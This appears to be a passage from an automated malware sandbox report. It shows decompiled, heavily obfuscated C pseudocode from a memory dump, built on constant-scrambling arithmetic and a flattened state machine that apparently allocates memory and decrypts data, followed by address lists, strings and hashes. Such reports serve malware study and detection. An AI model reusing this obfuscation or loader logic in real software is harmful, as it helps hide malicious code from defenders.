				_v100 = _v100 ^ 0x0084674e;
				_v108 = 0x5533;
				_v108 = _v108 >> 9;
				_v108 = _v108 | 0xd8fb4233;
				_v108 = _v108 ^ 0xd8fb1bcd;
				_v208 = 0xcae;
				_v208 = _v208 / _t579;
				_t580 = 0x13;
				_v208 = _v208 / _t580;
				_v208 = _v208 >> 0xa;
				_v208 = _v208 ^ 0x00001a16;
				_v216 = 0x40e3;
				_v216 = _v216 | 0x810267c5;
				_v216 = _v216 << 1;
				_v216 = _v216 << 3;
				_v216 = _v216 ^ 0x10267eee;
				_v28 = 0xb673;
				_t581 = 0x3e;
				_v28 = _v28 / _t581;
				_v28 = _v28 ^ 0x0000683f;
				_v40 = 0x9279;
				_v40 = _v40 + 0xffffeab6;
				_v40 = _v40 ^ 0x000054a5;
				_v204 = 0x1c40;
				_v204 = _v204 + 0xffff1f7d;
				_t582 = 0x50;
				_v204 = _v204 / _t582;
				_v204 = _v204 ^ 0x72bb6b9a;
				_v204 = _v204 ^ 0x71887e03;
				_v112 = 0xb897;
				_v112 = _v112 + 0xffffdcba;
				_v112 = _v112 | 0x14aad9bd;
				_v112 = _v112 ^ 0x14aaad8a;
				_v172 = 0xd85f;
				_v172 = _v172 + 0xffff9181;
				_t583 = 0x36;
				_v172 = _v172 * 0x2e;
				_v172 = _v172 + 0x3c74;
				_v172 = _v172 ^ 0x00135ecd;
				_v212 = 0x19f7;
				_v212 = _v212 + 0xffff95e1;
				_v212 = _v212 | 0x04fc32b0;
				_v212 = _v212 << 0xa;
				_v212 = _v212 ^ 0xfeffe01a;
				_v36 = 0x7d37;
				_v36 = _v36 | 0x20ef5b1a;
				_v36 = _v36 ^ 0x20ef0402;
				_v116 = 0xd595;
				_v116 = _v116 / _t583;
				_v116 = _v116 + 0xffffe49c;
				_v116 = _v116 ^ 0xffffa94a;
				_v160 = 0x5e14;
				_v160 = _v160 | 0xdf0c29a2;
				_v160 = _v160 ^ 0xe579e09e;
				_v160 = _v160 + 0xffffde5a;
				_v160 = _v160 ^ 0x3a753154;
				_v68 = 0x52ff;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x000014f4;
				_v76 = 0x7879;
				_t584 = 0x73;
				_v76 = _v76 / _t584;
				_v76 = _v76 ^ 0x0000054d;
				_v72 = 0x594e;
				_v72 = _v72 ^ 0x61e5003d;
				_v72 = _v72 ^ 0x61e57443;
				_v156 = 0xdc41;
				_v156 = _v156 << 6;
				_v156 = _v156 << 0x10;
				_v156 = _v156 ^ 0x10402e5f;
				_v152 = 0x2cab;
				_v152 = _v152 << 0xc;
				_v152 = _v152 ^ 0xa6d63634;
				_v152 = _v152 ^ 0xa41cdbd3;
				_v24 = 0xfca2;
				_v24 = _v24 >> 0xd;
				_v24 = _v24 ^ 0x000010c7;
				_v96 = 0xe6c1;
				_v96 = _v96 << 0xd;
				_v96 = _v96 + 0xc19f;
				_v96 = _v96 ^ 0x1cd8953a;
				_v224 = 0x49a1;
				_v224 = _v224 ^ 0xfe0521c0;
				_v224 = _v224 + 0x1e0d;
				_v224 = _v224 | 0x46707e16;
				_v224 = _v224 ^ 0xfe759897;
				_v228 = 0x2882;
				_v228 = _v228 << 0x10;
				_v228 = _v228 ^ 0x2e28bbbf;
				_v228 = _v228 | 0x3bec92e5;
				_v228 = _v228 ^ 0x3fee891d;
				_v136 = 0x5ad;
				_v136 = _v136 ^ 0x3d33a635;
				_v136 = _v136 + 0xffff9ac4;
				_v136 = _v136 ^ 0x3d335448;
				_v104 = 0x3c69;
				_v104 = _v104 + 0xf144;
				_t585 = 0x19;
				_v104 = _v104 * 0x1e;
				_v104 = _v104 ^ 0x0023546a;
				_v188 = 0xf300;
				_v188 = _v188 / _t585;
				_v188 = _v188 + 0xffffad26;
				_v188 = _v188 | 0x8105dcb8;
				_v188 = _v188 ^ 0xffffe238;
				_v144 = 0x45c8;
				_v144 = _v144 >> 0xe;
				_v144 = _v144 + 0x45b6;
				_v144 = _v144 ^ 0x000072cd;
				_v192 = 0xd236;
				_v192 = _v192 >> 0x10;
				_t586 = 0x69;
				_v192 = _v192 / _t586;
				_v192 = _v192 ^ 0x176600d6;
				_v192 = _v192 ^ 0x17663ad7;
				_v200 = 0x1b90;
				_v200 = _v200 >> 0xe;
				_v200 = _v200 | 0x00032953;
				_t587 = 0xe;
				_v200 = _v200 * 0x71;
				_v200 = _v200 ^ 0x016540c6;
				_v32 = 0xa5b;
				_v32 = _v32 / _t587;
				_v32 = _v32 ^ 0x00002bda;
				_v56 = 0xbe4e;
				_v56 = _v56 + 0xffffe059;
				_v56 = _v56 ^ 0x0000eaa3;
				_v220 = 0x4321;
				_v220 = _v220 ^ 0x3fa1daa1;
				_v220 = _v220 + 0xffff309f;
				_t588 = 0x24;
				_v220 = _v220 / _t588;
				_v220 = _v220 ^ 0x01c46047;
				_v164 = 0x3944;
				_v164 = _v164 + 0xffff1fd9;
				_t589 = 0x2b;
				_v164 = _v164 * 0x57;
				_v164 = _v164 << 4;
				_v164 = _v164 ^ 0xfc749d64;
				_v148 = 0x7755;
				_v148 = _v148 ^ 0x244775ea;
				_v148 = _v148 | 0xcd3e82a6;
				_v148 = _v148 ^ 0xed7f8152;
				_v88 = 0x40ad;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 ^ 0x000030bd;
				_v80 = 0x9327;
				_v80 = _v80 * 0x70;
				_v80 = _v80 ^ 0x00406c8d;
				_v176 = 0x8ba8;
				_v176 = _v176 + 0x5748;
				_v176 = _v176 + 0xffffe08a;
				_v176 = _v176 + 0xffffcf91;
				_v176 = _v176 ^ 0x0000bf1e;
				_v124 = 0xe985;
				_v124 = _v124 ^ 0x9cf6d459;
				_v124 = _v124 + 0xffffb832;
				_v124 = _v124 ^ 0x9cf5d440;
				_v184 = 0xee13;
				_v184 = _v184 / _t589;
				_v184 = _v184 ^ 0x973ecc13;
				_t590 = 0x6a;
				_v184 = _v184 / _t590;
				_v184 = _v184 ^ 0x016d24ef;
				_v84 = 0xbcf1;
				_v84 = _v84 ^ 0x64b03ea8;
				_v84 = _v84 ^ 0x64b0e2a8;
				_v60 = 0x8a4f;
				_v60 = _v60 | 0x8c15d5a4;
				_v60 = _v60 ^ 0x8c14dfef;
				_v44 = 0x30ef;
				_v44 = _v44 + 0xffffe2a4;
				_v44 = _v44 ^ 0x00001380;
				_v168 = 0xbe5e;
				_v168 = _v168 << 0x10;
				_v168 = _v168 | 0x5aa68a8d;
				_v168 = _v168 + 0xffff34cf;
				_v168 = _v168 ^ 0xfefdbf5d;
				goto L1;
				do {
					while(1) {
						L1:
						_t656 = _t641 - 0x2e2ba50c;
						if(_t656 > 0) {
							break;
						}
						if(_t656 == 0) {
							_push(_t590);
							_push(_t590);
							_t591 =  *0x25ca20; // 0x0
							_t590 = _t591 + 0x18;
							_t551 = E0024C46E(_t590, _v208, _v216, _v28, _v140 | _v64, _t590, _v40);
							_t653 =  &(_t653[7]);
							asm("sbb esi, esi");
							_t641 = ( ~_t551 & 0xf61d5154) + 0x3b32afa9;
							continue;
						} else {
							if(_t641 == 0xfdb1f24) {
								_t552 =  *0x25ca20; // 0x0
								_t554 =  *0x25ca20; // 0x0
								_t555 = E0024F292(_v72, _v156,  *((intOrPtr*)(_t554 + 0x18)), _v152, _v20, _v24, _t590, _v16, _t552 + 0x24, _t590, _v96);
								_t590 = _v224;
								asm("sbb esi, esi");
								_t641 = ( ~_t555 & 0x1a4c73ed) + 0x1af0d9d8;
								E00259465(_t590, _v20, _v228);
								_t653 =  &(_t653[0xa]);
								goto L27;
							} else {
								if(_t641 == 0x15e50797) {
									_push(_t590);
									_t597 = 0x34;
									_t562 = E00248736(_t597);
									 *0x25ca20 = _t562;
									_t590 = _t590;
									if(_t562 != 0) {
										_t641 = 0x2e2ba50c;
										continue;
									}
								} else {
									if(_t641 == 0x1af0d9d8) {
										_t599 =  *0x25ca20; // 0x0
										_t590 =  *(_t599 + 0x18);
										E002487FA(_t590);
										_t653 = _t653 - 0x10 + 0x10;
										_t641 = 0x3b32afa9;
										continue;
									} else {
										if(_t641 == 0x1f84fef1) {
											_t572 =  *0x25ca20; // 0x0
											_push(_t590);
											_push(_t590);
											E0025AB25(_t590,  *((intOrPtr*)(_t572 + 0x24)));
											_t653 =  &(_t653[3]);
											_t641 = 0x1af0d9d8;
											continue;
										} else {
											if(_t641 != 0x2135b5bc) {
												goto L27;
											} else {
												_t635 =  *0x25ca20; // 0x0
												_t437 = _t635 + 0x2c; // 0x2c
												_t590 = _t437;
												_t574 = E00251A1F(_t590,  *((intOrPtr*)(_t635 + 0x18)), _v220, _v120, _v164, _v148, _t590, _v88, _t590, _v80);
												_t653 =  &(_t653[8]);
												if(_t574 != 0) {
													_t639 = 1;
												} else {
													_t641 = 0x3151f296;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L21:
						return _t639;
					}
					if(_t641 == 0x315000fd) {
						_t590 = _v36;
						_t539 = E002475AE(_t590,  *_t575, _t590,  &_v20, _v44, _v116,  *((intOrPtr*)(_t575 + 4)),  &_v16, _v160, _v52, _v168 | _v60, _v68, _v76);
						_t653 =  &(_t653[0xb]);
						if(_t539 == 0) {
							_t641 = 0x1af0d9d8;
							goto L27;
						} else {
							_t641 = 0xfdb1f24;
							goto L1;
						}
					} else {
						if(_t641 == 0x3151f296) {
							_t544 =  *0x25ca20; // 0x0
							_push(_t590);
							_push(_t590);
							E0025AB25(_t590,  *((intOrPtr*)(_t544 + 0x10)));
							_t653 =  &(_t653[3]);
							_t641 = 0x1f84fef1;
							goto L1;
						} else {
							if(_t641 == 0x353d4dc5) {
								_t546 =  *0x25ca20; // 0x0
								_t592 =  *0x25ca20; // 0x0
								_t590 =  *(_t592 + 0x18);
								_t548 = E002466C9(_t590, _v48, _v132, _t546 + 0x10, _v192, _v200, _v32, _v56);
								_t653 =  &(_t653[6]);
								asm("sbb esi, esi");
								_t641 = ( ~_t548 & 0x01b0b6cb) + 0x1f84fef1;
								goto L1;
							} else {
								if(_t641 != 0x3b32afa9) {
									goto L27;
								} else {
									E0024F536(_v92, _v100, _v108,  *0x25ca20);
								}
							}
						}
					}
					goto L21;
					L27:
				} while (_t641 != 0x5edb69a);
				goto L21;
			}

0x00241d01
0x00241d0b
0x00241d0c
0x00241d0e
0x00241d13
0x00241d1e
0x00241d21
0x00241d2c
0x00241d2e
0x00241d37
0x00241d3f
0x00241d4a
0x00241d4f
0x00241d55
0x00241d5d
0x00241d65
0x00241d70
0x00241d7b
0x00241d86
0x00241d91
0x00241d9c
0x00241da7
0x00241db2
0x00241dbd
0x00241dd3
0x00241dde
0x00241de6
0x00241df1
0x00241df9
0x00241dfe
0x00241e06
0x00241e0e
0x00241e16
0x00241e1e
0x00241e26
0x00241e2e
0x00241e36
0x00241e42
0x00241e47
0x00241e52
0x00241e53
0x00241e57
0x00241e5f
0x00241e67
0x00241e6f
0x00241e77
0x00241e7f
0x00241e87
0x00241e92
0x00241ea6
0x00241ead
0x00241eb8
0x00241ec3
0x00241ecb
0x00241ed3
0x00241ede
0x00241ee9
0x00241ef1
0x00241efc
0x00241f07
0x00241f19
0x00241f23
0x00241f28
0x00241f2e
0x00241f33
0x00241f3b
0x00241f43
0x00241f4b
0x00241f4f
0x00241f54
0x00241f5c
0x00241f6e
0x00241f73
0x00241f7c
0x00241f87
0x00241f92
0x00241f9d
0x00241fa8
0x00241fb0
0x00241fbc
0x00241fc1
0x00241fc7
0x00241fcf
0x00241fd7
0x00241fe2
0x00241fed
0x00241ff8
0x00242003
0x0024200b
0x00242018
0x0024201b
0x0024201f
0x00242027
0x0024202f
0x00242037
0x0024203f
0x00242047
0x0024204c
0x00242054
0x0024205f
0x0024206a
0x00242075
0x0024208b
0x00242092
0x0024209d
0x002420a8
0x002420b0
0x002420b8
0x002420c0
0x002420c8
0x002420d0
0x002420db
0x002420e3
0x002420ee
0x00242100
0x00242103
0x0024210a
0x00242115
0x00242120
0x0024212d
0x00242138
0x00242140
0x00242145
0x0024214a
0x00242152
0x0024215a
0x0024215f
0x00242167
0x0024216f
0x0024217a
0x00242182
0x0024218d
0x00242198
0x002421a0
0x002421ab
0x002421b6
0x002421be
0x002421c6
0x002421ce
0x002421d6
0x002421de
0x002421e6
0x002421eb
0x002421f3
0x002421fb
0x00242203
0x0024220b
0x00242213
0x0024221b
0x00242223
0x0024222e
0x00242243
0x00242246
0x0024224d
0x00242258
0x00242268
0x0024226c
0x00242274
0x0024227c
0x00242284
0x0024228c
0x00242291
0x00242299
0x002422a1
0x002422a9
0x002422b2
0x002422b7
0x002422bd
0x002422c5
0x002422cd
0x002422d5
0x002422da
0x002422e7
0x002422e8
0x002422ec
0x002422f4
0x00242308
0x0024230f
0x0024231a
0x00242325
0x00242330
0x0024233b
0x00242343
0x0024234b
0x00242360
0x00242365
0x0024236b
0x00242373
0x0024237b
0x00242388
0x0024238b
0x0024238f
0x00242394
0x0024239c
0x002423a4
0x002423ac
0x002423b4
0x002423bc
0x002423c7
0x002423cf
0x002423da
0x002423ed
0x002423f4
0x002423ff
0x00242407
0x0024240f
0x00242417
0x0024241f
0x00242427
0x0024242f
0x00242437
0x0024243f
0x00242447
0x00242457
0x0024245b
0x00242467
0x0024246a
0x0024246e
0x00242476
0x00242481
0x0024248c
0x00242497
0x002424a2
0x002424ad
0x002424b8
0x002424c3
0x002424ce
0x002424d9
0x002424e1
0x002424e6
0x002424ee
0x002424f6
0x002424f6
0x002424fe
0x002424fe
0x002424fe
0x002424fe
0x00242504
0x00000000
0x00000000
0x0024250a
0x00242686
0x00242687
0x002426a7
0x002426b1
0x002426b4
0x002426b9
0x002426c0
0x002426c8
0x00000000
0x00242510
0x00242516
0x00242620
0x00242644
0x00242657
0x00242669
0x0024266f
0x00242677
0x00242679
0x0024267e
0x00000000
0x0024251c
0x00242522
0x002425f6
0x002425fa
0x002425fb
0x00242600
0x00242606
0x00242609
0x0024260f
0x00000000
0x0024260f
0x00242528
0x0024252a
0x002425cf
0x002425d5
0x002425d8
0x002425dd
0x002425e0
0x00000000
0x00242530
0x00242536
0x002425a0
0x002425a5
0x002425a6
0x002425aa
0x002425af
0x002425b2
0x00000000
0x00242538
0x0024253e
0x00000000
0x00242544
0x00242567
0x0024256d
0x0024256d
0x00242573
0x00242578
0x0024257d
0x0024282d
0x00242583
0x00242583
0x00000000
0x00242583
0x0024257d
0x0024253e
0x00242536
0x0024252a
0x00242522
0x00242516
0x00242721
0x0024272d
0x0024272d
0x002426d9
0x002427fb
0x00242802
0x00242807
0x0024280c
0x00242818
0x00000000
0x0024280e
0x0024280e
0x00000000
0x0024280e
0x002426df
0x002426e5
0x00242796
0x0024279b
0x0024279c
0x002427a0
0x002427a5
0x002427a8
0x00000000
0x002426eb
0x002426f1
0x00242744
0x0024275b
0x00242761
0x00242764
0x00242769
0x00242770
0x00242778
0x00000000
0x002426f3
0x002426f9
0x00000000
0x002426ff
0x0024271a
0x00242720
0x002426f9
0x002426f1
0x002426e5
0x00000000
0x0024281a
0x0024281a
0x00000000

Strings

0, xrefs: 002424B8
[, xrefs: 002422F4
HW, xrefs: 00242407
HT3=, xrefs: 0024221B
T1u:, xrefs: 002420C8
jT#, xrefs: 0024224D
!C, xrefs: 0024233B
i<, xrefs: 00242223
uG$, xrefs: 002423A4
D9, xrefs: 00242373
Cta, xrefs: 0024212D
t<, xrefs: 0024201F
?h, xrefs: 00241F7C
@, xrefs: 00241F3B
3U, xrefs: 00241EDE

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: !C$3U$?h$Cta$D9$HT3=$HW$T1u:$[$i<$jT#$t<$0$@$uG$
API String ID: 0-3043381779
Opcode ID: 51d4de2db118ece7601c2f618531f54f0d9f6d1912400e228acbf6f5f350341a
Instruction ID: 08eccabef50296966ec76911e3d65210b9804c2e4da6a66a488b6a1cb5546fb7
Opcode Fuzzy Hash: 51d4de2db118ece7601c2f618531f54f0d9f6d1912400e228acbf6f5f350341a
Instruction Fuzzy Hash: 3F423471508381DFE378CF25C98AA9BBBE1BBC4304F50891DE5DA962A0D7B58859CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0025511B, Relevance: 17.9, Strings: 14, Instructions: 390
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0025511B(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr* _v144;
				char _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				unsigned int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				unsigned int _v308;
				signed int _v312;
				signed int _v316;
				signed int _t462;
				intOrPtr* _t466;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				intOrPtr _t521;
				void* _t522;
				void* _t525;
				void* _t528;
				intOrPtr* _t531;
				signed int* _t532;

				_t466 = __ecx;
				_t532 =  &_v316;
				_v140 = __edx;
				_v144 = __ecx;
				_v132 = _v132 & 0x00000000;
				_v136 = 0x75b778;
				_v308 = 0x9968;
				_v308 = _v308 | 0x0cfdc455;
				_v308 = _v308 + 0xdd4c;
				_v308 = _v308 >> 3;
				_v308 = _v308 ^ 0x019fad6f;
				_v172 = 0xa03a;
				_v172 = _v172 >> 8;
				_v172 = _v172 ^ 0x00000391;
				_v228 = 0x2930;
				_v228 = _v228 << 0xc;
				_v228 = _v228 ^ 0x02930f5f;
				_v220 = 0x5883;
				_v220 = _v220 + 0xffff1c36;
				_v220 = _v220 ^ 0xffff6a37;
				_v288 = 0x122f;
				_v288 = _v288 << 0xf;
				_v288 = _v288 + 0xd44b;
				_v288 = _v288 << 0xa;
				_v288 = _v288 ^ 0x6151757c;
				_v260 = 0xc525;
				_v260 = _v260 << 0xa;
				_t522 = 0x1b8692db;
				_t513 = 0x61;
				_v260 = _v260 / _t513;
				_v260 = _v260 ^ 0x00083ddd;
				_v164 = 0x49a7;
				_t514 = 0x7b;
				_t462 = 0x17;
				_v164 = _v164 * 0x76;
				_v164 = _v164 ^ 0x002193f4;
				_v300 = 0x59a2;
				_v300 = _v300 ^ 0x3b27ac73;
				_v300 = _v300 + 0xffff6ec5;
				_v300 = _v300 + 0xffffb5fd;
				_v300 = _v300 ^ 0x3b271e50;
				_v252 = 0xb9af;
				_v252 = _v252 >> 8;
				_v252 = _v252 + 0xffffa108;
				_v252 = _v252 ^ 0xfffffedf;
				_v196 = 0x7b72;
				_v196 = _v196 << 2;
				_v196 = _v196 ^ 0x0001e8b2;
				_v272 = 0x250d;
				_v272 = _v272 * 0x16;
				_v272 = _v272 >> 3;
				_v272 = _v272 / _t514;
				_v272 = _v272 ^ 0x0000021c;
				_v156 = 0x4ea8;
				_v156 = _v156 + 0xffff8c10;
				_v156 = _v156 ^ 0xffffc687;
				_v292 = 0x9a7d;
				_v292 = _v292 << 1;
				_v292 = _v292 / _t462;
				_v292 = _v292 | 0x2e5edf0a;
				_v292 = _v292 ^ 0x2e5e89f7;
				_v236 = 0x69d3;
				_t515 = 0x5a;
				_v236 = _v236 / _t515;
				_v236 = _v236 >> 0xf;
				_v236 = _v236 ^ 0x000046bd;
				_v268 = 0x8cb9;
				_v268 = _v268 + 0xffff2c59;
				_v268 = _v268 << 4;
				_v268 = _v268 << 2;
				_v268 = _v268 ^ 0xffee6fc7;
				_v284 = 0x8a1;
				_v284 = _v284 ^ 0x358a3729;
				_v284 = _v284 << 4;
				_v284 = _v284 + 0xde3b;
				_v284 = _v284 ^ 0x58a4aa69;
				_v264 = 0x360c;
				_v264 = _v264 ^ 0xc2d2005c;
				_v264 = _v264 << 6;
				_t516 = 0x32;
				_v264 = _v264 * 0x5c;
				_v264 = _v264 ^ 0xe2e17670;
				_v180 = 0x8be;
				_v180 = _v180 | 0xafaf70c7;
				_v180 = _v180 ^ 0xafaf5d0a;
				_v168 = 0x59fe;
				_v168 = _v168 << 0xd;
				_v168 = _v168 ^ 0x0b3f82ad;
				_v188 = 0x197e;
				_v188 = _v188 << 4;
				_v188 = _v188 ^ 0x0001c80c;
				_v256 = 0x542a;
				_v256 = _v256 + 0x92cc;
				_v256 = _v256 | 0xa238a407;
				_v256 = _v256 ^ 0xa2389846;
				_v224 = 0x7627;
				_v224 = _v224 + 0xdff4;
				_v224 = _v224 ^ 0x000122df;
				_v316 = 0x3ece;
				_v316 = _v316 * 0x74;
				_v316 = _v316 >> 8;
				_v316 = _v316 | 0xc6a89cdb;
				_v316 = _v316 ^ 0xc6a8f635;
				_v244 = 0x10d9;
				_v244 = _v244 | 0xf517e732;
				_v244 = _v244 + 0x5e6f;
				_v244 = _v244 ^ 0xf518070f;
				_v160 = 0xb68b;
				_v160 = _v160 >> 7;
				_v160 = _v160 ^ 0x00003a74;
				_v276 = 0x3579;
				_v276 = _v276 | 0x431a7672;
				_v276 = _v276 << 2;
				_v276 = _v276 / _t516;
				_v276 = _v276 ^ 0x003ff326;
				_v216 = 0xcfb7;
				_t517 = 0x63;
				_v216 = _v216 / _t517;
				_v216 = _v216 ^ 0x00003917;
				_v312 = 0xd3b7;
				_v312 = _v312 ^ 0x43b1e200;
				_v312 = _v312 << 8;
				_t518 = 0x70;
				_v312 = _v312 / _t518;
				_v312 = _v312 ^ 0x01952af0;
				_v248 = 0xe683;
				_v248 = _v248 | 0xeb182d0f;
				_v248 = _v248 + 0xcf0c;
				_v248 = _v248 ^ 0xeb19e4ec;
				_v204 = 0xada2;
				_v204 = _v204 >> 0x10;
				_v204 = _v204 ^ 0x000009df;
				_v152 = 0xb32a;
				_v152 = _v152 + 0xffff4f9d;
				_v152 = _v152 ^ 0x00004085;
				_v212 = 0xbe4c;
				_t531 = _a4;
				_v212 = _v212 * 5;
				_v212 = _v212 ^ 0x00039e07;
				_v280 = 0xc7f7;
				_v280 = _v280 | 0xad7c9e6f;
				_v280 = _v280 * 0x1c;
				_v280 = _v280 | 0xde3ec68b;
				_v280 = _v280 ^ 0xffbea491;
				_v240 = 0x8de7;
				_v240 = _v240 * 0x45;
				_t463 = _v140;
				_v240 = _v240 / _t462;
				_v240 = _v240 ^ 0x00019f2b;
				_v304 = 0x16f;
				_v304 = _v304 | 0xdf403998;
				_v304 = _v304 ^ 0x6a41af55;
				_v304 = _v304 | 0x5f7c1de9;
				_v304 = _v304 ^ 0xff7dd65d;
				_v208 = 0xa25a;
				_v208 = _v208 / _t518;
				_v208 = _v208 ^ 0x00007fd0;
				_v184 = 0x444f;
				_t519 = 0x26;
				_v184 = _v184 * 0x7d;
				_v184 = _v184 ^ 0x002171af;
				_v192 = 0x6191;
				_v192 = _v192 << 6;
				_v192 = _v192 ^ 0x00185c0b;
				_v200 = 0x9864;
				_v200 = _v200 / _t519;
				_v200 = _v200 ^ 0x0000693d;
				_v232 = 0xae1;
				_v232 = _v232 ^ 0x7986b26b;
				_t520 = 0x49;
				_t521 = _v140;
				_v232 = _v232 / _t520;
				_v232 = _v232 ^ 0x01aa59fa;
				_v176 = 0xf7eb;
				_v176 = _v176 * 0x67;
				_v176 = _v176 ^ 0x0063e620;
				_v296 = 0x2b09;
				_v296 = _v296 + 0xffffdaa4;
				_v296 = _v296 | 0x1659e70b;
				_v296 = _v296 ^ 0x3abae7e6;
				_v296 = _v296 ^ 0x2ce32170;
				while(_t522 != 0xa551406) {
					if(_t522 == 0x10f51287) {
						E00252674(_v204, _v152,  *((intOrPtr*)(_t466 + 4)), _t521, _v212, _v280,  *_t466);
						_t466 = _v144;
						_t532 =  &(_t532[5]);
						_t522 = 0x3013e9c6;
						_t521 = _t521 +  *((intOrPtr*)(_t466 + 4));
						continue;
					}
					if(_t522 == 0x14284095) {
						_t522 = 0x28f75045;
						_a4 =  *((intOrPtr*)(_t466 + 4)) + 0x1000;
						continue;
					}
					if(_t522 == 0x1b8692db) {
						_v148 = E00258C8F(_t466);
						_t522 = 0x14284095;
						L10:
						_t466 = _v144;
						continue;
					}
					if(_t522 == 0x28f75045) {
						_push(_t466);
						_push(_t466);
						_t521 = E00248736(_a4);
						 *_t531 = _t521;
						__eflags = _t521;
						if(_t521 == 0) {
							L16:
							__eflags = 0;
							return 0;
						}
						_t522 = 0xa551406;
						_t463 = _a4 + _t521;
						__eflags = _a4 + _t521;
						goto L10;
					}
					_t541 = _t522 - 0x3013e9c6;
					if(_t522 != 0x3013e9c6) {
						L15:
						__eflags = _t522 - 0x28249ddd;
						if(__eflags != 0) {
							continue;
						}
						goto L16;
					}
					_push(0x25c7a0);
					_push(_v208);
					E00247F4B(_t521, E0025878F(_v240, _v304, _t541), _v184, _v140, _v192, _v200);
					E00252025(_v232, _t457, _v176, _v296);
					return 1;
				}
				_t525 = (E0024EDCF(_v260, _v164,  &_v148, _v300) & 0x0000000f) + 4;
				E0024B605( &_v64,  &_v148, _t525, _v252, _v196, _v272);
				_t373 =  &_v292; // 0xe2e17670
				 *((char*)(_t532 + _t525 + 0x130)) = 0;
				_t528 = (E0024EDCF(_v156,  *_t373,  &_v148, _v236) & 0x0000000f) + 4;
				E0024B605( &_v128,  &_v148, _t528, _v268, _v284, _v264);
				_push(0x25c710);
				_push(_v188);
				 *((char*)(_t532 + _t528 + 0x10c)) = 0;
				_t521 = _t521 + E002411C1( &_v64, _v224, _v316,  &_v128, _v140, _t521, _v244, _v160, _t463 - _t521, E0025878F(_v180, _v168, __eflags), _v276);
				__eflags = _t521;
				E00252025(_v216, _t440, _v312, _v248);
				_t466 = _v144;
				_t532 =  &(_t532[0x1c]);
				_t522 = 0x10f51287;
				goto L15;
			}

0x0025511b
0x0025511b
0x00255125
0x0025512c
0x00255133
0x0025513b
0x00255146
0x0025514e
0x00255156
0x0025515e
0x00255163
0x0025516b
0x00255176
0x0025517e
0x00255189
0x00255191
0x00255196
0x0025519e
0x002551a6
0x002551ae
0x002551b6
0x002551be
0x002551c3
0x002551cb
0x002551d0
0x002551d8
0x002551e0
0x002551e9
0x002551f2
0x002551f7
0x002551fd
0x00255205
0x00255218
0x0025521b
0x0025521e
0x00255225
0x00255230
0x00255238
0x00255240
0x00255248
0x00255250
0x00255258
0x00255260
0x00255265
0x0025526d
0x00255275
0x00255280
0x00255288
0x00255293
0x002552a0
0x002552a4
0x002552b1
0x002552b5
0x002552bd
0x002552c8
0x002552d3
0x002552de
0x002552e6
0x002552f0
0x002552f4
0x002552fc
0x00255306
0x00255312
0x00255317
0x0025531d
0x00255322
0x0025532a
0x00255332
0x0025533a
0x0025533f
0x00255344
0x0025534c
0x00255354
0x0025535c
0x00255361
0x00255369
0x00255371
0x00255379
0x00255381
0x0025538b
0x0025538e
0x00255392
0x0025539a
0x002553a5
0x002553b0
0x002553bb
0x002553c6
0x002553ce
0x002553d9
0x002553e4
0x002553ec
0x002553f7
0x002553ff
0x00255407
0x0025540f
0x00255417
0x0025541f
0x00255427
0x0025542f
0x0025543c
0x00255440
0x00255445
0x0025544d
0x00255455
0x0025545d
0x00255465
0x0025546d
0x00255475
0x00255480
0x00255488
0x00255493
0x0025549b
0x002554a3
0x002554b0
0x002554b4
0x002554bc
0x002554c8
0x002554cd
0x002554d3
0x002554db
0x002554e3
0x002554eb
0x002554f4
0x002554f7
0x002554fb
0x00255503
0x0025550b
0x00255513
0x0025551b
0x00255525
0x00255530
0x00255538
0x00255543
0x0025554e
0x00255559
0x00255564
0x00255573
0x0025557a
0x0025557e
0x00255586
0x0025558e
0x0025559b
0x0025559f
0x002555a7
0x002555af
0x002555bc
0x002555c8
0x002555cf
0x002555d3
0x002555db
0x002555e3
0x002555eb
0x002555f3
0x002555fb
0x00255603
0x00255619
0x00255620
0x0025562b
0x0025563e
0x00255641
0x00255648
0x00255653
0x0025565e
0x00255666
0x00255671
0x00255687
0x0025568e
0x00255699
0x002556a1
0x002556ad
0x002556b0
0x002556b7
0x002556bb
0x002556c3
0x002556d6
0x002556dd
0x002556e8
0x002556f0
0x002556f8
0x00255700
0x00255708
0x00255710
0x00255722
0x00255848
0x0025584d
0x00255854
0x00255857
0x0025585c
0x00000000
0x0025585c
0x0025572e
0x00255817
0x00255821
0x00000000
0x00255821
0x0025573a
0x00255806
0x0025580d
0x002557ea
0x002557ea
0x00000000
0x002557ea
0x00255746
0x002557c7
0x002557c8
0x002557d1
0x002557d3
0x002557d8
0x002557da
0x00255998
0x00255998
0x00000000
0x00255998
0x002557e3
0x002557e8
0x002557e8
0x00000000
0x002557e8
0x00255748
0x0025574e
0x0025598c
0x0025598c
0x00255992
0x00000000
0x00000000
0x00000000
0x00255992
0x00255754
0x00255759
0x00255792
0x002557ab
0x00000000
0x002557b5
0x002558a2
0x002558a7
0x002558b0
0x002558c3
0x002558ef
0x002558f4
0x002558f9
0x002558fe
0x00255913
0x0025596b
0x0025596b
0x00255978
0x0025597d
0x00255984
0x00255987
0x00000000

Strings

o^, xrefs: 00255465
=i, xrefs: 0025568E
y5, xrefs: 00255493
